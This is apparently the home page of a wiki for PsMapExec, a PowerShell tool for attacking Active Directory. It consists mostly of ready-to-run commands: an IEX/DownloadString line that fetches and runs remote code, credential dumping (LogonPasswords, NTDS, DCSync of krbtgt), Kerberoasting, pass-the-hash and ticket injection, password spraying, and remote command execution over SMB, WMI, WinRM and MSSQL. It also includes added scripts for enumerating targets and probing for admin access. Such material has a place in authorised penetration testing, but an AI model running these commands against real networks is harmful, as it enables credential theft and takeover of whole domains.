Home
Welcome to the PsMapExec Wiki. The purpose of the Wiki is to give instruction on how to fully utilize PsMapExec to dominate Active Directory.
🚨 Please see the sidebar to the right. It is highly recommended to read through the pages in order. 🚨
Load PsMapExec into the current PowerShell session:

```powershell
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
```
Below are some command examples. Generally, most methods can be combined with the different target specifications and credential types (password, hash or ticket) described further down on this page.
```powershell
# SMB
PsMapExec SMB -Targets "ALL" -Username "user" -Password "Pass" -Command "ipconfig" -Domain "security.local"
PsMapExec SMB -Targets "Workstations" -Username "user" -Password "Pass" -Module "LogonPasswords" -ShowOutput
PsMapExec SMB -Targets "DC01.Security.local" -Username "user" -Hash "8846F7EAEE8..." -Module "KerbDump" -ShowOutput
PsMapExec SMB -Targets "10.10.10.0/24" -Ticket "doIFmjCCBZagAwIBBaEDAgEWooIE..."

# WMI
PsMapExec WMI -Targets "Servers" -Username "user" -Password "Pass" -Command "ipconfig"
PsMapExec WMI -Targets "Servers" -Username "administrator" -Password "Pass" -Module "SCCM" -LocalAuth
PsMapExec WMI -Targets "WKSTN0*" -Ticket "doIFmjCCBZagAwIBBaEDAgEWooIE..." -Domain "security.local"

# WinRM
PsMapExec WinRM -Targets "ALL" -Username "user" -Password "Pass" -Command "ipconfig"
PsMapExec WinRM -Targets "C:\scope.txt" -Ticket "doIFmjCCBZagAwIBBaEDAgEWooIE..." -Domain "security.local"
PsMapExec WinRM -Targets "DC01.Security.local" -Username "user" -Hash "8846F7EAEE8..." -Module "NTDS" -ShowOutput

# LDAP/S
PsMapExec LDAP -Targets "DCs" -Username "user" -Password "Pass"
PsMapExec LDAP -Targets "DC1" -Username "user" -Password "Pass" -module "whoami"
PsMapExec LDAP -Targets "DC1" -Ticket "doIFmjCCBZagAwIBBaEDAgEWooIE..." -Module "AddComputer" -Domain "security.local"
PsMapExec LDAP -Targets "DC1" -Username "user" -Password "Pass" -Module Elevate -TargetDN "CN=Mendez,CN=Users,DC=SECURITY,DC=LOCAL"
PsMapExec LDAP -Targets "DC1" -Username "user" -Hash "8846F7EAEE8..." -Module "timeroast" -ShowOutput

# Kerberoast stuff
PsMapExec kerberoast -Domain "dev.security.local" -ShowOutput
PsMapExec kerberoast -Domain "dev.security.local" -Option "Kerberoast:dev_user_1" -ShowOutput

# RDP
PsMapExec RDP -Targets "Servers" -Username "user" -Password "password"
PsMapExec RDP -Targets "Servers" -Username "user" -Password "password" -Domain "dev.security.local" -LocalAuth

# DCSync
PsMapExec DCSync -Targets "DC1.security.local" -ShowOutput -Domain "security.local"
PsMapExec DCSync -Targets "DC1.security.local" -option "dcsync:security\krbtgt" -ShowOutput

# SMB Signing
PsMapExec GenRelayList -Targets "All" -Domain "Security.local"
PsMapExec GenRelayList -Targets "Servers" -Domain "Security.local"

# Inject Kerberos tickets into current session
PsMapExec Inject -Ticket "doIhsj..."
PsMapExec Inject -Ticket "C:\ticket.txt"
PsMapExec Inject -Username "user" -Hash "8846F7EAEE8..." -Domain "security.local"
PsMapExec Inject -Username "user" -Password "password" -Domain "security.local"

# IPMI hashes
PsMapExec IPMI -Targets "Servers" -Domain "security.local"
PsMapExec IPMI -Targets "All" -Option "IPMI:bob_admin"

# MSSQL
PsMapExec MSSQL -Targets "All" -Username "SA" -Password "Password123" -LocalAuth
PsMapExec MSSQL -Targets "All" -Command "whoami" -Domain "security.local"

# Spray credentials
PsMapExec Spray -SprayPassword "password"
PsMapExec Spray -AccountAsPassword -Domain "dev.security.local"
PsMapExec Spray -EmptyPassword -Domain "security.local"
PsMapExec Spray -Pre2k
PsMapExec Spray -SprayHash [RC4]
PsMapExec Spray -SprayHash [AES256]
PsMapExec Spray -SprayHash [LM:NT]

# Check for VNC no auth
PsMapExec VNC -Target "All" -Domain "Security.local"
```
Target acquisition in PsMapExec is done through the ADSI searcher. As long as you are operating from a domain-joined system as a domain user account, acquiring targets should work without issues. By default only enabled Active Directory computer accounts are populated into the target list. PsMapExec sets the domain to the current user's domain unless -Domain is specified. Targeting by IP address is less preferred than using the built-in LDAP queries.
```powershell
# All workstations, servers and domain controllers within the domain
PsMapExec [Method] -Targets All

# All workstations, servers and domain controllers on the specified domain
PsMapExec [Method] -Targets All -Domain [Domain]

# Only servers from the domain (excluding DCs)
PsMapExec [Method] -Targets Servers

# Only Domain Controllers from the domain
PsMapExec [Method] -Targets DCs

# Only workstations from the domain
PsMapExec [Method] -Targets Workstations

# Set the target values to a defined computer name
PsMapExec [Method] -Targets DC01.Security.local

# Read targets from file
PsMapExec [Method] -Targets "C:\Targets.txt"

# Wildcard filtering
PsMapExec [Method] -Targets SRV*

# Single IP Address
PsMapExec [Method] -Targets 192.168.56.11

# CIDR Range
PsMapExec [Method] -Targets 192.168.56.0/24
```
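As an added example (not PsMapExec's own code), the following PowerShell reproduces the targeting rules described above with a DirectorySearcher: enabled computer accounts only, the current user's domain unless -Domain is given, and the All/Servers/DCs/Workstations, file, wildcard, single IP and CIDR forms. The split of DCs/Servers/Workstations on userAccountControl 0x2000 and the operatingSystem attribute, the skipping of network and broadcast addresses in a CIDR range, and the sample records at the end are assumptions of this example; the page does not state how PsMapExec itself classifies hosts.

```powershell
# Added example, not PsMapExec's own code. Assumptions (not confirmed by the page):
# DCs are identified by SERVER_TRUST_ACCOUNT (0x2000) in userAccountControl and
# servers by "Server" in operatingSystem; PsMapExec may classify differently.

function Get-DomainComputers {
    param([string]$Domain)
    # Empty ADsPath binds to the current user's domain; -Domain becomes a
    # serverless bind to that domain's naming context (assumed to be reachable).
    $root = if ($Domain) {
        $dn = ($Domain -split '\.' | ForEach-Object { "DC=$_" }) -join ','
        [ADSI]"LDAP://$dn"
    } else { [ADSI]'' }
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    # objectCategory=computer, minus accounts with the ACCOUNTDISABLE bit (0x2) set
    $searcher.Filter   = '(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    $searcher.PageSize = 1000
    foreach ($p in 'name','dNSHostName','operatingSystem','userAccountControl') { [void]$searcher.PropertiesToLoad.Add($p) }
    foreach ($r in $searcher.FindAll()) {
        [pscustomobject]@{
            Name               = [string]$r.Properties['name'][0]
            DnsHostName        = [string]$r.Properties['dnshostname'][0]
            OperatingSystem    = [string]$r.Properties['operatingsystem'][0]
            UserAccountControl = [int]$r.Properties['useraccountcontrol'][0]
        }
    }
}

function Get-TargetClass {
    param($Computer)
    if ($Computer.UserAccountControl -band 0x2000) { return 'DCs' }      # SERVER_TRUST_ACCOUNT
    if ($Computer.OperatingSystem -match 'Server')  { return 'Servers' }
    return 'Workstations'
}

function Expand-Cidr {
    param([string]$Cidr)
    $ip, $prefix = $Cidr -split '/'
    $prefix = [int]$prefix
    $bytes = [System.Net.IPAddress]::Parse($ip).GetAddressBytes()
    [Array]::Reverse($bytes)                                    # little-endian for ToUInt32
    $base    = [int64][BitConverter]::ToUInt32($bytes, 0)
    $size    = [int64]1 -shl (32 - $prefix)
    $network = $base - ($base % $size)
    # Skip the network and broadcast addresses except for /31 and /32
    $first = if ($prefix -ge 31) { $network } else { $network + 1 }
    $last  = if ($prefix -ge 31) { $network + $size - 1 } else { $network + $size - 2 }
    for ($n = $first; $n -le $last; $n++) {
        $b = [BitConverter]::GetBytes([uint32]$n)
        [Array]::Reverse($b)
        [System.Net.IPAddress]::new($b).ToString()
    }
}

function Resolve-Targets {
    param(
        [Parameter(Mandatory)][string]$Targets,
        [string]$Domain,
        [object[]]$Computers    # pre-built list (used by the offline sample below); otherwise queried via LDAP
    )
    if (-not $Computers -and ($Targets -match '^(All|Servers|DCs|Workstations)$' -or $Targets -match '[*?]')) {
        $Computers = @(Get-DomainComputers -Domain $Domain)
    }
    switch -Regex ($Targets) {
        '^(All|Servers|DCs|Workstations)$' {
            $Computers | Where-Object { $Targets -eq 'All' -or (Get-TargetClass $_) -eq $Targets } |
                ForEach-Object { $_.DnsHostName }
            break
        }
        '^\d{1,3}(\.\d{1,3}){3}/\d{1,2}$' { Expand-Cidr $Targets; break }
        '^\d{1,3}(\.\d{1,3}){3}$'         { $Targets; break }
        '[*?]' {
            $Computers | Where-Object { $_.Name -like $Targets -or $_.DnsHostName -like $Targets } |
                ForEach-Object { $_.DnsHostName }
            break
        }
        default {
            if (Test-Path -LiteralPath $Targets -PathType Leaf) {
                Get-Content -LiteralPath $Targets | ForEach-Object { $_.Trim() } | Where-Object { $_ }
            } else { $Targets }          # a single host name such as DC01.Security.local
        }
    }
}

# Constructed sample records (not real hosts) so the classification, wildcard
# and CIDR branches can be exercised without a domain.
$sample = @(
    [pscustomobject]@{ Name = 'DC01';    DnsHostName = 'DC01.security.local';    OperatingSystem = 'Windows Server 2022 Standard'; UserAccountControl = 532480 }
    [pscustomobject]@{ Name = 'SRV01';   DnsHostName = 'SRV01.security.local';   OperatingSystem = 'Windows Server 2019 Standard'; UserAccountControl = 4096 }
    [pscustomobject]@{ Name = 'WKSTN01'; DnsHostName = 'WKSTN01.security.local'; OperatingSystem = 'Windows 11 Enterprise';        UserAccountControl = 4096 }
)
Resolve-Targets -Targets 'Servers' -Computers $sample
Resolve-Targets -Targets 'WKSTN0*' -Computers $sample
Resolve-Targets -Targets '192.168.56.0/30'
```

The 'All', 'Servers', 'DCs', 'Workstations' and wildcard forms need the LDAP query (or a pre-built list as in the sample), while a host name, a file or an IP/CIDR spec never touches the directory, which is why IP targeting loses the enabled-only filter and the DNS names the LDAP path provides.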
When both -Command and -Module are omitted, PsMapExec simply checks the provided credentials (or those of the current user) against the specified target systems for administrative access over the chosen method.
```powershell
# Current user
PsMapExec [Method] -Targets All

# With Password
PsMapExec [Method] -Targets All -Username [Username] -Password [Password]

# With Hash
PsMapExec [Method] -Targets All -Username [Username] -Hash [RC4/AES256/NTLM]

# With Ticket
PsMapExec [Method] -Targets All -Ticket [doI.. OR Path to ticket file]

# Local Authentication (shown here with WMI; the examples above also pass -LocalAuth to RDP and MSSQL)
PsMapExec WMI -Targets All -LocalAuth -Username [Username] -Password [Password]
```
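To make concrete what a credential-only run tests, here is an added example (not PsMapExec's own code) of an administrative-access check over SMB, WMI and WinRM using plain PowerShell cmdlets. The choice of probes is an assumption of this example: reading ADMIN$ for SMB, a DCOM WMI query against root\cimv2 for WMI, and a trivial Invoke-Command for WinRM. The page does not say how PsMapExec performs its own check, and hash or ticket authentication is not covered here.

```powershell
# Added example, not PsMapExec's own code. The probes below are assumptions
# about what "administrative access over the method" means for each protocol.

function Test-AdminAccess {
    param(
        [Parameter(Mandatory)][string]$Target,
        [ValidateSet('SMB','WMI','WinRM')][string]$Method = 'SMB',
        [pscredential]$Credential       # omit to use the current logon session's identity
    )
    try {
        switch ($Method) {
            'SMB' {
                # ADMIN$ (the remote %SystemRoot%) is readable only by local administrators
                $p = @{ Name = 'pmeAdmin'; PSProvider = 'FileSystem'; Root = "\\$Target\ADMIN$"; ErrorAction = 'Stop' }
                if ($Credential) { $p.Credential = $Credential }
                $drive = New-PSDrive @p
                $null = Get-ChildItem -LiteralPath "$($drive.Name):\" -ErrorAction Stop | Select-Object -First 1
                Remove-PSDrive -Name $drive.Name -Force
            }
            'WMI' {
                # DCOM, not WS-Man, so this exercises the same transport as the WMI method;
                # remote access to root\cimv2 is limited to Administrators by default
                $p = @{ ComputerName = $Target; SessionOption = (New-CimSessionOption -Protocol Dcom); ErrorAction = 'Stop' }
                if ($Credential) { $p.Credential = $Credential }
                $session = New-CimSession @p -OperationTimeoutSec 10
                $null = Get-CimInstance -CimSession $session -ClassName Win32_OperatingSystem -ErrorAction Stop
                Remove-CimSession $session
            }
            'WinRM' {
                $p = @{ ComputerName = $Target; ScriptBlock = { $env:COMPUTERNAME }; ErrorAction = 'Stop' }
                if ($Credential) { $p.Credential = $Credential }
                $null = Invoke-Command @p
            }
        }
        return $true
    } catch {
        return $false
    }
}

# Usage: a domain account (DOMAIN\user) versus a local account on the target
# (TARGET\user), the latter being what a -LocalAuth style run authenticates as.
$domainCred = Get-Credential -Message 'security.local\user'
$localCred  = Get-Credential -Message 'SRV01\administrator (local account on the target)'
foreach ($m in 'SMB','WMI','WinRM') {
    [pscustomobject]@{
        Target = 'SRV01.security.local'
        Method = $m
        Domain = Test-AdminAccess -Target 'SRV01.security.local' -Method $m -Credential $domainCred
        Local  = Test-AdminAccess -Target 'SRV01.security.local' -Method $m -Credential $localCred
    }
}
```

One caveat when reading the results: a successful WinRM probe is a weaker signal than the other two, because members of the Remote Management Users group can run Invoke-Command without being local administrators, whereas ADMIN$ and (by default) remote WMI require administrative rights.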
All currently supported command execution methods support the -Command parameter. It can be appended to any of the authentication types above to execute the given command as the specified user, or as the current user when no credentials are supplied.

```powershell
PsMapExec [Method] -Targets All -Command [Command]
```

All currently supported command execution methods also support the -Module parameter. It can likewise be appended to the authentication types above to execute the given module as the specified user, or as the current user when no credentials are supplied.

```powershell
PsMapExec [Method] -Targets All -Module [Module]
```